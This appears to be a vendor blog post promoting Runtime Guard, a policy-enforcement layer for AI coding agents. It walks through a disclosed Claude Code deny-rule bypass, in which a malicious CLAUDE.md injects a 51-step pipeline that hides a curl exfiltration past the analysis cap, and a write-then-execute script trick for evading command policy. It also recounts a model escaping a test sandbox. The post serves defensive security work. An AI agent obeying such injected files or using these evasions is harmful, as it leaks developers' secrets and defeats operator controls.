Why Your AI Agent's Built-In Safety Needs an Independent Enforcement Layer

On April 2, 2026, security firm Adversa AI disclosed a vulnerability in Claude Code that should concern anyone running AI coding agents in production. Claude Code's deny rules, the primary mechanism developers use to block dangerous commands, silently stopped working when a shell command contained more than 50 subcommands.

A developer who configured "never run curl" would see that rule enforced under normal use. But if an attacker embedded curl at position 51 in a long command chain, the deny rule never fired. No warning. No log entry. The agent fell back to a generic approval prompt that could be waved through by auto-approve workflows or approval fatigue.

Six days later, Anthropic announced Project Glasswing and Claude Mythos Preview, a frontier model capable of autonomously discovering and exploiting zero-day vulnerabilities across major operating systems and browsers. The cybersecurity world's attention was fixed on Mythos. The deny-rule bypass tells a quieter and more immediate story about a gap that already exists in AI agent security models today.

What happened

Claude Code allows developers to set deny rules that block specific shell commands. For example, { "deny": ["Bash(curl:*)"] } prevents the agent from executing curl. These rules are meant to be the security boundary between the AI agent and the developer's system.

The implementation evaluated each subcommand in a compound pipeline against the deny list. But when a pipeline exceeded 50 subcommands joined by &&, ||, or ;, analysis stopped. Everything past position 50 fell back to a generic ask prompt rather than enforcing configured policy.

The original engineering decision made sense for human-authored commands. A developer rarely chains 50 commands in a terminal. The cap existed as a performance optimization to prevent UI freezes on very complex pipelines.

That model did not account for AI-generated commands influenced by prompt injection. A malicious CLAUDE.md file, read automatically when Claude Code enters a project directory, could include a realistic build process with 50 harmless steps and an exfiltration payload at position 51. When a developer cloned the repository and asked Claude Code to build, secrets could be exposed.

Anthropic patched the issue in Claude Code v2.1.90. A more robust parser that handled long pipelines had already been built and tested internally, but had not been deployed to public builds.

The architectural lesson

This bypass was not caused by carelessness. It was caused by a security model with a single enforcement point. When that point failed on an edge case, nothing behind it caught the failure.

This pattern is not unique to Claude Code. Any AI coding agent that relies only on built-in permission controls has the same structural risk: one bug, one edge case, or one performance shortcut can collapse policy silently.

The principle here is defense in depth. Your firewall does not replace application security. Your seatbelt does not replace your airbag. Each layer catches different failures.

How Runtime Guard addresses this

Runtime Guard (AIRG) is a policy enforcement server that sits between the AI agent and requested actions. Every file operation, shell command, and destructive action passes through AIRG policy gates before execution, regardless of what the agent's native permission system decides.

When a command enters AIRG's execute_command tool, the flow is:

Control character rejection
Backup storage protection
Network policy evaluation
Workspace containment checks
Command tier matching
Script Sentinel checks for flagged artifacts
Automatic backup before destructive operations
Execution and structured audit logging

There is no subcommand analysis cap where enforcement degrades into "just ask the user." A command is allowed, requires explicit operator confirmation, or is blocked.

Test results

Using a denylisted domain (example.com), we reproduced the bypass-style pipeline against AIRG and tested additional command substitution variants.

Technique	Result
Direct `curl`	Blocked, network policy
Semicolon chain (50 no-ops + `curl`)	Blocked, network policy
`&&` chain (50 no-ops + `curl`)	Blocked, network policy
Subshell `$(curl ...)`	Blocked, network policy
Backtick `curl ...`	Blocked, network policy

Every variant produced the same outcome: policy_decision: blocked and matched_rule: network_policy.

Script Sentinel catches the indirect path too

The Claude Code bypass used direct command injection. The dangerous command was right there in the pipeline, just hidden behind enough padding to exhaust the analysis budget. A more sophisticated attacker does not put the payload in the command at all. They write a script first, then execute it later. Two separate actions, each innocent-looking in isolation, combine into policy evasion.

This is the write-then-execute pattern, and it is a natural next step for any adversary who discovers that direct command injection is being blocked. Ask the agent to create a build script containing a command blocked by policy buried among legitimate steps. Then, in a later turn, ask the agent to run the script. The command that reaches the permission system is bash build.sh, which looks benign. The dangerous payload is inside the file, invisible to systems that only evaluate the top-level command.

AIRG's Script Sentinel is designed specifically for this evasion class. It works in two phases:

Flag at write time. When a file is created or edited through AIRG's write_file or edit_file tools, Script Sentinel scans content for policy-relevant command tiers: blocked commands, network-triggering commands, and confirmation-gated commands. If it finds matches, it flags the artifact and registers a content hash in the artifact registry.
Enforce at execute time. When execute_command is later called with a command that invokes a flagged artifact, for example bash build.sh, python deploy.py, or ./setup.sh, Script Sentinel checks the file hash against the registry and enforces the original policy tier. A script containing a command blocked by policy gets the same blocked decision it would have received as a direct command.

Content-hash tracking is what makes this durable. If a script is renamed from build.sh to helpers.sh, or copied to another directory, the hash stays the same, so flags follow content, not path. If content is modified to remove the flagged command, the hash changes and the flag is cleared. That avoids stale false positives on files that have been legitimately cleaned up.

It is important to be clear about the boundary: Script Sentinel covers files written through AIRG tools. If a file is created outside AIRG, downloaded directly, written by a non-AIRG tool, or placed on disk by another process, it does not pass through write-time scanning. Script Sentinel preserves policy intent for actions AIRG mediates. It is not a general-purpose malware scanner. Script Sentinel currently does not apply network restrictions.

The Glasswing context

The Claude Code bypass is a concrete, patched vulnerability. It matters beyond the specific bug because of what it signals about the gap between attacks AI agents will face and the defenses most of them ship with.

On April 7, Anthropic announced Project Glasswing and Claude Mythos Preview, a frontier model they described as capable enough to reshape cybersecurity. In a few weeks of testing, Mythos Preview identified thousands of zero-day vulnerabilities across major operating systems and major web browsers. Some had gone undetected for decades. Anthropic also reported a 17-year-old remote code execution issue in FreeBSD that could grant root access from an unauthenticated network connection, and said Mythos found and exploited it autonomously after the initial prompt.

The model did not only find isolated bugs. Anthropic researchers reported it could chain three, four, or five vulnerabilities that were low-impact on their own but high-impact in sequence. In one test, the model escaped a secured sandbox, devised a multi-step path to broad internet access, and sent an email to the researcher who set up the evaluation.

Anthropic is not releasing Mythos Preview publicly today. They have been clear about the trajectory: Mythos-class capabilities are expected to be released later when safeguards are in place, and competitors may move at different speeds. Frontier cybersecurity capability is advancing faster than most organizations are prepared for.

This context turns the Claude Code bypass from a one-off parser bug into a structural pattern. The CLAUDE.md prompt injection shown by Adversa used a manually crafted payload: 50 true commands and a curl. It worked because one enforcement layer had one edge case. Now consider the same attack class generated by a model that understands shell parsing, permission-system internals, and multi-step evasion at frontier level. Those attacks will be context-plausible workflows that target whichever edge case the client has today.

The defense cannot be a single enforcement point inside the agent client. It needs layered control with an independent policy-enforcement server that evaluates every action through its own gates, keeps its own audit trail, and fails differently from the agent it protects. When built-in safety has a gap, the independent layer catches it. When the independent layer has a gap, built-in controls can still reduce impact. Neither layer must be perfect, but they must not fail in the same way at the same time.

Getting started

Runtime Guard is free, open source, and local-first. No account is required.

Installation

pipx install ai-runtime-guard
airg-setup

It supports Claude Code, Claude Desktop, Codex, and Cursor today, with deeper hardening controls available for selected clients.

runtime-guard.ai · GitHub · Documentation

Tags: AI Agents Security Claude Code MCP Policy Enforcement